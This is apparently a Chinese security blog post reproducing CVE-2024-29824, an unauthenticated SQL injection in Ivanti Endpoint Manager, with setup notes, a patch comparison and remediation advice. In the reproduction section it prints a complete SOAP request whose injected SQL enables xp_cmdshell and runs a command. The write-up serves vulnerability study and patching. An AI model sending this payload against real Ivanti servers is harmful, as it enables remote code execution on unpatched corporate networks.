长亭百川云 - 文章详情

CVE-2024-29824:Ivanti EPM SQL注入漏洞

七安

48

2024-06-19

关注我们 ❤️,添加星标 🌟,一起学安全!
作者:七安@Timeline Sec
本文字数:2351
阅读时长:2 ~ 4min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介


Ivanti Endpoint Manager (EPM) 是一款由 Ivanti 公司开发的综合性端点管理解决方案。它旨在帮助企业有效管理和保护其网络中的所有端点设备,包括桌面、笔记本电脑、服务器、移动设备和虚拟环境。

0x02 漏洞概述


漏洞编号:CVE-2024-29824

攻击者可以利用该漏洞进行未授权的 SQL 注入并可以执行系统任意代码。官方的公告中提出的是:

An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

Ivanti EPM 2022 SU5 及更早版本的核心服务器中存在未指定的 SQL 注入漏洞,允许同一网络内未经身份验证的攻击者执行任意代码。(此设备内网环境中使用偏多)

0x03 影响版本


version <= Ivanti EPM 2022 SU5

0x04 环境搭建


下载安装包,需要注意的是:Ivanti Endpoint Manager 需要安装 Windows Server 下

然后一直点下一步就好了,安装过程大概需要 30 分钟左右,由于并没有许可,所以我们选择试用。

激活之后访问 https://IP 即可,这里访问首页会得到如下错误

这个错误并不影响我们漏洞复现,因此可以不纠结这个错误

0x05 漏洞复现


使用 BP 发送请求

使用 Process Hacker 查看进程,可以到 calc.exe 已经在后台运行,执行命令成功。

完整数据包:

POST /WSStatusEvents/EventHandler.asmx HTTP/1.1  
Host: host  
User-Agent: python-requests/2.31.0  
Accept-Encoding: gzip, deflate, br  
Accept: */*  
Connection: close  
Content-Type: application/soap+xml  
Content-Length: 720  
  
<?xml version="1.0" encoding="utf-8"?>  
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">  
  <soap12:Body>  
    <UpdateStatusEvents xmlns="http://tempuri.org/">  
      <deviceID>string</deviceID>  
      <actions>  
        <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">  
          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'calc.exe'--</status>  
        </Action>  
      </actions>  
    </UpdateStatusEvents>  
  </soap12:Body>  
</soap12:Envelope>

0x06 补丁对比


具体的分析可以看 horizon3 

JetBrains dotPeek
搜索函数可以使用 Navigate
->Go to Symbol...
进行搜索。

在 2022 SU5 中 RecordGoodApp
函数内容如下:

在这段代码中开发直接将用户输入与 SQL 语句通过字符串拼接在一起,最终导致了 SQL 注入并可以执行系统命令。而在补丁中

开发者将 SQL 查询改为了参数化查询,将用户的输入作为参数传递进去,有效防止了 SQL 注入

0x07 修复方式


  1. 更新补丁,可以在 https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024?language=en\_US 下载该漏洞的补丁

  2. 不要开发到公网上

参考链接


回复【加群】进入微信交流群
回复【SRC群】进入SRC-QQ交流群
回复【新人】领取新人学习指南资料
回复【面试】获取渗透测试常见面试题
回复【合作】获取各类安全项目合作方式
回复【帮会】付费加入SRC知识库学习
回复【培训】获取官方直播精品课程详情

视频号:搜索TimelineSec

官方微博:#小程序://微博/tPbUYdN9EucSD4C

哔哩哔哩:https://space.bilibili.com/52459‍1903

觉得有用就收藏起来吧!

顺便点个赞和在看

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2